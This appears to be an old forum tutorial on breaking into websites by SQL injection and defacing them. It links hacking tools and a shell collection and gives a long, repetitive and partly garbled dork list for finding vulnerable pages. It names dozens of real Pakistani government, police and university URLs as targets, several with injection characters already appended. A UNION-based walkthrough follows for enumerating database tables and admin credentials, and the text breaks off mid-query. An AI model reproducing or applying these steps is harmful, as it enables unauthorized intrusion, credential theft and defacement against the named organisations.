1. What is SQL?

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

2. What is Defacement ?

A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own.

What do you need before you start with SQL Injection.

*You need Admin Finder ( to find admin panel from website )*
*SQL Injection Vulnerable Scanner*

Admin Finder:
This software help you find admin panel of website

Code:
http://www.mediafire.com/?0a4aw2gmeohndny
Vulnerable Scanner:
Code:
http://seanstar.000space.com/
Code:
http://newbie.000space.com/sql%20scanner/
or you can use Exploit Scanner.

Dorks for Finding Vulnerable sites!:

Code:
inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurllay_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurlageid=
    inurl:games.php?id=
    inurlage.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurltray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurlreview.php?id=
    inurl:loadpsb.php?id=
    inurlpinions.php?id=
    inurl:spr.php?id=
    inurlages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurlarticipant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurlrod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurlerson.php?id=
    inurlroductinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurlrofile_view.php?id=
    inurl:category.php?id=
    inurlublications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurlrod_info.php?id=
    inurl:shop.php?do=part&id=
    inurlroductinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurlroduct.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurlroduit.php?id=
    inurlop.php?id=
    inurl:shopping.php?id=
    inurlroductdetail.php?id=
    inurlost.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurlage.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurlroduct_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:tran**.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:review.php?id=
    inurl:loadpsb.php?id=
    inurl:ages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurlpinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurlffer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurllay_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurlageid=
    inurl:games.php?id=
    inurlage.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurltray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurlreview.php?id=
    inurl:loadpsb.php?id=
    inurlpinions.php?id=
    inurl:spr.php?id=
    inurlages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurlarticipant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurlrod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurlerson.php?id=
    inurlroductinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurlrofile_view.php?id=
    inurl:category.php?id=
    inurlublications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurlrod_info.php?id=
    inurl:shop.php?do=part&id=
    inurlroductinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurlroduct.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurlroduit.php?id=
    inurlop.php?id=
    inurl:shopping.php?id=
    inurlroductdetail.php?id=
    inurlost.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurlage.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurlroduct_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:tran**.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:review.php?id=
    inurl:loadpsb.php?id=
    inurl:ages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurlpinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurlffer.php?idf=
MD5 Hash Crackers Online:
Code:
http://www.md5crack.com/
    http://www.md5decrypter.com/
    http://www.md5decrypter.co.uk/
    http://md5.rednoize.com/
    http://md5decryption.com/
    http://www.md5decrypter.com/
    http://passcracking.com/
    http://md5.my-addr.com/md5_decrypt-md5_c...r_tool.php
    http://www.xmd5.org/
    http://www.md5cracker.com/index.php
    http://md5.noisette.ch/index.php
    http://md5cracker.org
Text to ASCII Converter:
Code:
http://www.mikezilla.com/exp0012.htm...ode=%26%23120;
Code:
http://getyourwebsitehere.com/jswb/text_to_ascii.html
Shell:

Code:
http://www.kinginfet.net/shells/
Some vulnerable websites:

Code:
http://www.sdpd.org.pk/news_detail.php?ID=82
    http://pakhumanitarianforum.com.pk/m...dex.php?id=146
    http://www.nwfpuet.edu.pk/viewnews.php?id=209
    http://www.unapakistan.org.pk/newsdetail.php?id=41
    http://www.beaconhouse.edu.pk/bssgro..._main.php?id=7
    http://www.neduet.edu.pk/webmag/articles.php?id=1
    http://www.pdma.gov.pk/newsArchive.php?ID=74
    http://www.smeda.org.pk/main.php?id=34
    http://www.mb.com.pk/products.php?id=29
    http://www.hu.edu.pk/contacts.php?id=2
    http://www.whatmobile.com.pk/viewallcomments.php?id=402
    http://www.phdeb.org.pk/topstoriesEv...il.php?id=2499
    http://www.shifa.com.pk/consultants/detailed.php?id=4
    http://www.lums.edu.pk/news/news_detail.php?id=270
    http://www.balochistanpolice.gov.pk/page.php?id=3
    http://www.bzu.edu.pk/departmentindex.php?id=48
    http://www.qpc.edu.pk/news.php?id=176
    http://www.cmc.net.pk/product_detail2.php?id=10
    http://www.cmc.net.pk/gen_cmc.php?id=2
    http://www.ogra.org.pk/art_desc.php?id=%2737&cat=15
    http://econ.lums.edu.pk/people_detail.php?id=6
    http://www.mamooinpakistan.com/default.php?id=18'
    http://www.aeo.com.pk/indexnew.php?id=1'
    http://elections.com.pk/candidatedetails.php?id=1'
    http://www.pakwatan.com/health_detail.php?id=1'
    http://www.ahmedquraishi.com/latest_col.php?id=2'
    http://www.danka.com.pk/viewEvent.php?id=1'
    http://www.psf.gov.pk/home/abstract.php?id='129
    http://www.gjtmap.gov.pk/ngos/sb_bro_ngo.php?id='14
    http://new1.tdap.gov.pk/v1/others/weekly...php?id='07
    http://iri.iiu.edu.pk/index.php?page_id='21
    http://www.icpap.com.pk/index.php?page_id=34
    http://www.balochistanpolice.gov.pk/page.php?id='3
    http://www.psf.gov.pk/home/staffdetail.php?id='17
    http://www.psf.gov.pk/home/abstract.php?id='129
    http://www.gjtmap.gov.pk/ngos/sb_bro_ngo.php?id='14
    http://www.pdma.gov.pk/news.php?ID='75
    http://www.psf.gov.pk/home/news.php?id='...mp;y='2009
    http://www.pdma.gov.pk/newsArchive.php?ID='74
    http://www.gjtmap.gov.pk/poll/index_poll.php?id='35
    http://new1.tdap.gov.pk/v1/others/weekly...php?id='07
    http://www.balochistanpolice.gov.pk/page.php?id='3
    http://www.pdma.gov.pk/newsArchive.php?ID='74
    http://www.pdma.gov.pk/news.php?ID='75
    http://www.psf.gov.pk/home/staffdetail.php?id='17
    http://www.psf.gov.pk/home/abstract.php?id='129
    http://www.psf.gov.pk/home/news.php?id='...mp;y='2009
Mostly that bugs find in pakistan sites

Starting Tutorial:

1. First you need to find vulnerable website.
Code:
http://sql-vuln-site.com/index.php?id=15
(for example )

2. Now you need to find columns.


2. Now you need to find columns.
Code:
http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )
    http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )
    http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )
    http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )
    http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )
    http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )
Error`s looks like this:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'39' at line 1
    database query failure- SELECT * FROM texecom_sidemenu WHERE id=\'39
3. Now Select columns

Columns is 5

Code:
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5--
4. Finding version.

So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.
I choose 1
Code:
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5--
you got the version like this
Code:
5.0.32-Debian_7etch11-log
5. Finding Tables
Code:
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables--
And you will got tables like this:
Code:
PRODUCTS , ADMINS , and others

    So must be there table by name: admin , users , user , login , client.

    6. Finding Columns in the Table ADMINS.
http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information